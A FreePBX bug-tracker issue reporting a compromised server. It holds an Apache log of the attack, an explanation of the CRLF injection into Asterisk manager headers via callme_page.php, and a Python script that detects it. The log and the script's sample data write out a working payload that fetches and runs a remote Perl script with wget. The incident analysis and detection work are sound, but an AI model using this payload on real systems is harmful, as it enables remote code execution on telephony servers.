FreePBX / FREEPBX-5845

my system was compromised


    Details

    • Type: Bug
    • Status: Closed
    • Resolution: Not an issue
    • Affects Version/s: 2.9
    • Fix Version/s: None
    • Component/s: ARI User Portal
    • Labels:
      None

      Description

      yesterday my system was compromised: a PHP shell script was added to

      /var/www/localhost/htdocs/recordings/main.php

      Apache log information:

      {noformat}
      37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/logo.png HTTP/1.1" 200 8049
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/spacer.gif HTTP/1.1" 200 43
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
      37.8.21.40 - - [21/May/2012:08:54:38 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/js/libfreepbx.javascripts.js HTTP/1.1" 200 302944
      37.8.21.40 - - [21/May/2012:08:54:46 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin HTTP/1.1" 301 235
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/ HTTP/1.1" 302 -
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - freepbx [21/May/2012:08:55:20 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:08:55:26 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/script.js.php?load_version=2.9.0.10 HTTP/1.1" 200 1111
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.cookie.js HTTP/1.1" 200 4247
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.toggleval.3.0.js HTTP/1.1" 200 3496
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/interface.dim.js HTTP/1.1" 200 3761
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
      37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/assets/js/tabber-minimized.js HTTP/1.1" 200 4904
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
      37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/images/favicon.ico HTTP/1.1" 200 318
      37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/ HTTP/1.1" 302 -
      37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - freepbx [21/May/2012:09:00:29 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:09:00:34 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:09:00:45 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - - [21/May/2012:09:00:46 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
      37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/freepbx_large.png?load_version=2.9.0.10 HTTP/1.1" 200 7590
      37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/logo.png?load_version=2.9.0.10 HTTP/1.1" 200 5699
      37.8.21.40 - - [21/May/2012:09:00:51 +0400] "GET /panel HTTP/1.1" 401 401
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
      37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155
      37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
      37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
      37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
      37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127
      37.8.21.40 - - [21/May/2012:09:21:27 +0400] "GET /recordings/main.php HTTP/1.1" 404 217
      {noformat}

      my system: Gentoo, FreePBX 2.9.0.10
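
The log above shows the mechanism rather than just the result: the `callmenum` parameter of `/recordings/misc/callme_page.php` is submitted as `*011@from-internal/n` followed by percent-encoded CR/LF pairs and two further lines, `Application: system` and `Data: wget ... ; perl /tmp/back.txt`. Those are Asterisk manager (AMI) Originate headers, so whatever the page appends `callmenum` to is being used as a line in a manager action, and a CR/LF in the value lets the caller add headers of their own. Note the two attempts: at 09:20:50 the CR/LF is double-encoded (`%250D%250A`, which the web server decodes only once, leaving a literal `%0D%0A` in the value), and at 09:21:00 it is single-encoded, which is the request that actually carried the newlines into the application. The script below is an added example, not FreePBX code and not part of the report: it replays detection over the report's own log lines plus one constructed benign request, separates the double-encoded probe from the live injection, and reconstructs the smuggled headers. The `CALLMENUM_OK_RE` allowlist is an assumption about what a legitimate extension-to-ring value looks like, used here to classify anything else as suspicious.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)'
)
# An injected Asterisk manager header looks like "Application: system".
AMI_HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
# Assumed allowlist for a legitimate callmenum (an extension to ring): digits and
# the usual dial characters only. Illustrative check, not the project's own code.
CALLMENUM_OK_RE = re.compile(r"^[0-9*#+]{1,32}$")

# Constructed sample: the first three lines are copied from the access log in the
# report; the last line (host 10.0.0.5, callmenum=2001) is a made-up benign request.
SAMPLE_LOG = """\
37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293
37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155
37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127
10.0.0.5 - - [21/May/2012:09:30:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=2001 HTTP/1.1" 200 1127
"""


def raw_param(query, name):
    """Return the still-percent-encoded value of `name` from a query string."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def has_crlf(value):
    return "\r" in value or "\n" in value


def parse_injected(decoded):
    """Split a CR/LF-bearing callmenum into the channel fragment the attacker
    completed and the AMI headers smuggled in after it (lower-cased names)."""
    lines = re.split(r"\r\n|\r|\n", decoded)
    headers = {}
    for line in lines[1:]:
        m = AMI_HEADER_RE.match(line)
        if m:
            headers[m.group(1).lower()] = m.group(2)
    return lines[0], headers


def scan_log(text):
    """Classify every callme_page.php request in an Apache access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host, _ident, _user, ts, _method, target, _proto, status, _size = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith("/recordings/misc/callme_page.php"):
            continue
        raw = raw_param(query, "callmenum")
        if raw is None:
            continue
        once = unquote(raw)    # the single decode the web server performs before PHP sees it
        twice = unquote(once)  # one more round, to expose double-encoded probes
        finding = {"host": host, "time": ts, "status": status,
                   "callmenum": once, "channel": once, "headers": {}}
        if has_crlf(once):
            finding["verdict"] = "INJECTION"          # newlines reached the application
            finding["channel"], finding["headers"] = parse_injected(once)
        elif twice != once and has_crlf(twice):
            finding["verdict"] = "DOUBLE_ENCODED_PROBE"  # app saw literal %0D%0A, not CR/LF
            finding["channel"], finding["headers"] = parse_injected(twice)
        elif CALLMENUM_OK_RE.match(once):
            finding["verdict"] = "BENIGN"
        else:
            finding["verdict"] = "SUSPICIOUS"
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['verdict']}")
        if f["headers"]:
            print("    channel fragment:", f["channel"])
            for name, value in f["headers"].items():
                print(f"    injected {name}: {value}")
```

Run against the sample, the 09:20:50 request is reported as a double-encoded probe, the 09:21:00 request as a live injection with `application` = `system` and `data` = the wget/perl command, and the constructed `2001` request as benign. The same `CALLMENUM_OK_RE` allowlist, applied server-side before the value is placed into any manager action, is the shape of check that closes this class of header injection: reject anything containing CR, LF or characters outside the dialable set rather than trying to strip them.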

        People

        • Assignee: Unassigned
        • Reporter: a0d75 a0d75
